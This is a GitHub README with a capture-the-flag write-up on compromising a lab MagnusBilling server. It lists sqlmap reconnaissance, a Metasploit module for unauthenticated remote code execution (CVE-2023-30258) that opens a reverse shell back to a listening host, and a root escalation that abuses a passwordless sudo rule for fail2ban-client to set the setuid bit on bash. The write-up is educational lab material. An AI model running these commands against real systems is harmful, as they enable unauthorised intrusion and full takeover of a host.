Skip to content

HawkSec38/Billing-CTF

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 
picture
picture
 
 

Repository files navigation

Capture-the-Flag (CFT) Exploitation Documentation

Author: [Goodluck Temilolu Oyebisi ] Date: August 2025 Platform: Linux / Kali / Metasploit / Python3 / Fail2Ban

Overview

This documentation presents a step-by-step breakdown of a realistic penetration test scenario on a vulnerable MagnusBilling instance, culminating in privilege escalation to root. It demonstrates careful exploitation while following ethical guidelines for legal testing environments.

Target

  • IP: 10.10.57.157
  • Services Identified: HTTP (mbilling web app), Asterisk Call Manager (TCP 5038)
  • Tools Used: Metasploit, SQLMap, Python, Fail2Ban

Step 1: Reconnaissance

  1. Enumerated web endpoints using SQLMap to test for SQL injection:

    sqlmap -u "http://10.10.30.141/mbilling" --crawl=3 --batch --random-agent

  2. Discovered login endpoint using HTTP POST request:

    POST /mbilling/index.php/authentication/login

  3. Identified Asterisk Call Manager on port 5038 via Telnet.

Step 2: Exploitation

2.1 Remote Code Execution (RCE)

  • Used Metasploit module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

  • Configured reverse TCP payload:

    RHOST = 10.10.57.157
LHOST = 10.9.1.109

  • Confirmed vulnerability via command injection test.

  • Spawned a Meterpreter session, then dropped into a shell:

    meterpreter > shell

Step 3: Privilege Escalation via Fail2Ban Misconfiguration

  1. Checked sudo privileges:

    sudo -l

    Output showed NOPASSWD for /usr/bin/fail2ban-client.

  2. Exploited Fail2Ban jail asterisk-iptables:

    sudo /usr/bin/fail2ban-client set asterisk-iptables action iptables-allports-ASTERISK actionban 'chmod +s /bin/bash'
sudo /usr/bin/fail2ban-client set asterisk-iptables banip 8.8.8.8

  3. Elevated privileges by spawning a root shell:

    /bin/bash -p

Step 4: Post-Exploitation Notes

  • Verified root access:

    whoami  # root

  • Highlighted setuid-based escalation vulnerability due to misconfigured Fail2Ban jail.

  • Emphasized ethical testing principles: all exploits performed on authorized lab environments.

Key Takeaways

  1. Check for misconfigured sudo privileges on automated tools like Fail2Ban.
  2. Combining RCE with sudo misconfigurations can yield root access quickly.
  3. Ethical and controlled testing environments are essential for learning and responsible disclosure.

Tools & References

Disclaimer: This documentation is intended for educational purposes and testing in authorized environments only. Unauthorized exploitation is illegal and unethical.

--

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors